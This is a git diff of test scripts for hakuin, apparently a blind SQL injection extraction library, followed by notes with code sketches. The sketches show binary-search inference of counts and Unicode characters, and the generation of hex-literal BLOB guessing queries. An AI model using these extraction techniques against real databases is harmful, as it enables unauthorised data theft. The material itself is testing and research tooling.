+++ b/tests/test_large_content.py
@@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
 def main():
     assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [<table> <column>]'
 
-    requester = OfflineRequester(db='large_content')
+    requester = OfflineRequester(db='large_content', verbose=False)
     ext = Extractor(requester=requester, dbms=SQLite())
 
     if len(sys.argv) == 3:
@@ -60,58 +60,58 @@ if __name__ == '__main__':
 # {
 #     "users": {
 #         "username": [
-#             42124,
-#             5.738182808881624
+#             42125,
+#             5.738319030104891
 #         ],
 #         "first_name": [
-#             27901,
-#             4.882919145957298
+#             27902,
+#             4.883094154707735
 #         ],
 #         "last_name": [
-#             32701,
-#             5.344173884621671
+#             32702,
+#             5.344337310017977
 #         ],
 #         "sex": [
-#             1608,
-#             0.3216
+#             1609,
+#             0.3218
 #         ],
 #         "email": [
-#             78138,
-#             3.7532062058696383
+#             78139,
+#             3.7532542389163743
 #         ],
 #         "password": [
-#             137115,
-#             4.28484375
+#             137116,
+#             4.284875
 #         ],
 #         "address": [
-#             86872,
-#             2.1946795341434453
+#             86873,
+#             2.1947047975140843
 #         ]
 #     },
 #     "posts": {
 #         "text": [
-#             409302,
-#             4.312482220185226
+#             409303,
+#             4.312492756371759
 #         ]
 #     },
 #     "comments": {
 #         "text": [
-#             346373,
-#             3.920464063384267
+#             346374,
+#             3.9204753820033957
 #         ]
 #     },
 #     "products": {
 #         "name": [
-#             491174,
-#             3.8737341871983344
+#             491175,
+#             3.873742073882457
 #         ],
 #         "category": [
-#             6721,
-#             0.42975893599334997
+#             6753,
+#             0.4318051026280453
 #         ],
 #         "description": [
-#             966309,
-#             3.2259549579023976
+#             966310,
+#             3.2259582963324007
 #         ]
 #     }
 # }
diff --git a/tests/test_large_schema.py b/tests/test_large_schema.py
index c4e43c5..60bf245 100644
--- a/tests/test_large_schema.py
+++ b/tests/test_large_schema.py
@@ -27,3 +27,8 @@ def main():
 
 if __name__ == '__main__':
     main()
+
+
+# Expected results:
+# Total requests: 27376
+# Average RPC: 2.2098805295447206
\ No newline at end of file
diff --git a/tests/test_online.py b/tests/test_online.py
index bced01d..20b44ff 100644
--- a/tests/test_online.py
+++ b/tests/test_online.py
@@ -25,13 +25,17 @@ class R(Requester):
         r = requests.get(url)
         assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}'
+
+        # print(ctx.s, r.status_code == 200, query)
 
         return r.status_code == 200
 
 
 def main():
-    assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>'
-    _, dbms_type, table, column = sys.argv
+    assert len(sys.argv) in [2, 4], 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
+    argv = sys.argv + [None, None]
+    _, dbms_type, table, column = argv[:4]
+
     allowed = ['sqlite', 'mysql']
     assert dbms_type in allowed, f'dbms must be in {allowed}'
 
@@ -39,10 +43,12 @@ def main():
     dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
     ext = Extractor(requester, dbms)
 
-    res = ext.extract_schema(metadata=True)
-    print(json.dumps(res, indent=4))
-    res = ext.extract_column(table, column)
-    print(json.dumps(res, indent=4))
+    if table is None:
+        res = ext.extract_schema(strategy='model', metadata=True)
+        print(json.dumps(res, indent=4))
+    else:
+        res = ext.extract_column(table, column)
+        print(json.dumps(res, indent=4))
diff --git a/tests/test_small_schema.py b/tests/test_small_schema.py
new file mode 100644
index 0000000..fecd828
--- /dev/null
+++ b/tests/test_small_schema.py
@@ -0,0 +1,29 @@
+import json
+import logging
+
+from hakuin.dbms import SQLite
+from hakuin import Extractor
+
+from OfflineRequester import OfflineRequester
+
+
+
+logging.basicConfig(level=logging.INFO)
+
+
+
+def main():
+    requester = OfflineRequester(db='large_content')
+    ext = Extractor(requester=requester, dbms=SQLite())
+
+    res = ext.extract_schema(metadata=True)
+    print(json.dumps(res, indent=4))
+
+    res_len = sum([len(table) for table in res])
+    res_len += sum([len(column) for table, columns in res.items() for column in columns])
+    print('Total requests:', requester.n_queries)
+    print('Average RPC:', requester.n_queries / res_len)
+
+
+if __name__ == '__main__':
+    main()
diff --git a/tests/test_unicode.py b/tests/test_unicode.py
new file mode 100644
index 0000000..310856c
--- /dev/null
+++ b/tests/test_unicode.py
@@ -0,0 +1,28 @@
+import json
+import logging
+
+import hakuin
+from hakuin import Extractor
+from hakuin.dbms import SQLite
+
+from OfflineRequester import OfflineRequester
+
+
+
+logging.basicConfig(level=logging.INFO)
+
+
+
+def main():
+    requester = OfflineRequester(db='unicode', verbose=False)
+    ext = Extractor(requester=requester, dbms=SQLite())
+
+    res = ext.extract_schema(strategy='binary')
+    print(res)
+
+    res = ext.extract_column('Ħ€ȽȽ© ŴǑȒȽƉ', 'Ħ€ȽȽ© ŴǑȒȽƉ')
+    print(res)
+
+
+if __name__ == '__main__':
+    main()
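
Note on the renamed IntExponentialBinarySearch: it first doubles the upper bound until the oracle confirms the hidden value lies below it, then binary-searches the bracketed range, so inferring a count around N costs roughly 2*log2(N) requests. A minimal standalone sketch of the same idea — `oracle` is an illustrative stand-in for one blind-SQLi request and is not part of the library API:

def exp_binary_search(oracle, lower=0, upper=16):
    # Exponential phase: double the bound until the value falls in [lower, upper).
    while not oracle(upper):
        lower, upper = upper, upper * 2

    # Binary phase: maintain the invariant oracle(upper) and not oracle(lower).
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if oracle(middle):
            upper = middle
        else:
            lower = middle

    return lower

# Emulated oracle answering "is the hidden value < n?" for the value 1337.
assert exp_binary_search(lambda n: 1337 < n) == 1337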
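The new char_unicode query and the ASCII_MAX/UNICODE_MAX constants apply the same bracketing to characters: a code point is pinned down with predicates of the form unicode(c) < n, which takes at most about log2(0x110000), i.e. 21 requests, even for non-ASCII text. A sketch of the emulated search, again with an illustrative oracle:

UNICODE_MAX = 0x10ffff  # highest valid Unicode code point

def extract_char(oracle):
    # Binary search over code points; oracle(n) mirrors the SQL predicate
    # "unicode(substr(column, i, 1)) < n" built by char_unicode.
    lower, upper = 0, UNICODE_MAX + 1
    while upper - lower > 1:
        middle = (lower + upper) // 2
        if oracle(middle):
            upper = middle
        else:
            lower = middle
    return chr(lower)

# Emulated oracle for the character 'Ħ' (U+0126) from the unicode test DB.
assert extract_char(lambda n: ord('Ħ') < n) == 'Ħ'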
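The string guessing query in SQLiteRowsQueries casts the column to a BLOB and compares it against UTF-8 hex literals, so whole-string guesses stay byte-exact regardless of text encoding or collation. Roughly what the generated SQL looks like — the table and column names below are hypothetical:

# Hypothetical example: guessing the value of products.name, row 0.
values = ['Ħ€ȽȽ©', 'hello']
literals = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f"SELECT cast(name as BLOB) in ({','.join(literals)}) FROM products LIMIT 1 OFFSET 0"
print(query)
# SELECT cast(name as BLOB) in (x'c4a6e282acc8bdc8bdc2a9',x'68656c6c6f') FROM products LIMIT 1 OFFSET 0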